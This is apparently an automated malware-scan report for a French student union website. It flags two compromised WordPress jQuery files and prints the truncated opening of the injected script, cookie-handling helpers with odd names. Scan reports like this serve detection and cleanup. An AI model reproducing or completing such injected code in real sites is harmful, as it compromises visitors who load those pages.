Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sud-etudiant.org
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sud-etudiant.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 01:04:26 GMT Location: http://www.solidaires-etudiant-e-s.org/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.solidaires-etudiant-e-s.org/ | HTTP/1.1 200 OK Connection: close Date: Wed, 24 Sep 2014 01:04:27 GMT Server: Apache/2.2.22 (Debian) Vary: Cookie,Accept-Encoding Content-Type: text/html; charset=utf-8 Last-Modified: Wed, 24 Sep 2014 01:04:27 GMT Composed-By: SPIP 3.0.17-1 (Debian) @ www.spip.net + spip(3.0.13),compagnon(1.4.1),dump(1.6.7),images(1.1.7),forum(1.8.29),jqueryui(1.8.21),mediabox(0.8.4),mots(2.4.10),msie_compat(1.2.0),organiseur(0.8.10),petitions(1.4.4),porte_plume(1.12.4),revisions(1.7.6),safehtml(1.4.0),sites(1.7.10),squelettes_par_rubrique(1.1.1),stats(0.4.19),svp(0.80.18),tw(0.8.17),urls(1.4.15),vertebres(1.2.2),alias(0.1.1),article_pdf(0.4.5),spip_bonux(3.0.5),calendriermini(2.3.5),agenda(3.12.1),iterateurs(0.6.1),queue(0.6.6),breves(1.3.5),compresseur(1.8.6),medias(2.7.51),accesrestreint(3.8.8),sarkaspip(3.2.36) X-Powered-By: PHP/5.4.4-14+deb7u14 X-Spip-Cache: 86400 | clean |
http://www.solidaires-etudiant.org/ | 200 OK Content-Length: 58454 Content-Type: text/html | clean |
http://www.solidaires-etudiant.org/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 96723 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function Depositormengarslife() {
    function Expocarus(name, value, expires) {
        var date = new Date( new Date().getTime() + expires*1000 );
        document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
    }
    function Afillatepost(name) {
        var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
        return afrodita ? decodeURIComponent(afrodita[1]) : undefined;
    }
    var cookie = jQuery.noConflict();
Antivirus reports:
http://www.solidaires-etudiant.org/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 8116 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function Depositormengarslife() {
    function Expocarus(name, value, expires) {
        var date = new Date( new Date().getTime() + expires*1000 );
        document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
    }
    function Afillatepost(name) {
        var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
        return afrodita ? decodeURIComponent(afrodita[1]) : undefined;
    }
    var cookie =
Antivirus reports:
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/jcarousellite_1.0.1.pack.js | 200 OK Content-Length: 3059 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 16799 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/colorbox/jquery.colorbox-min.js | 200 OK Content-Length: 10742 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/scripts.js | 200 OK Content-Length: 7793 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js | 200 OK Content-Length: 16170 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/plugins/contact-form-7/includes/js/scripts.js | 200 OK Content-Length: 10580 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.solidaires-etudiant.org/wp-content/plugins/jetpack/modules/wpgroho.js | 200 OK Content-Length: 1881 Content-Type: application/javascript | clean |
http://stats.wp.com/e-201439.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://sud-etudiant.org/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 01:04:35 GMT Location: http://www.solidaires-etudiant-e-s.org/test404page.js Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 343 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.solidaires-etudiant-e-s.org/test404page.js | 404 Not Found Content-Length: 309 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sud-etudiant.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 24 Sep 2014 01:04:26 GMT
Location: http://www.solidaires-etudiant-e-s.org/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
...329 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sud-etudiant.org
Referer: http://www.google.com/search?q=sud-etudiant.org
Result:
The result is similar to the first query. There are no suspicious redirects found.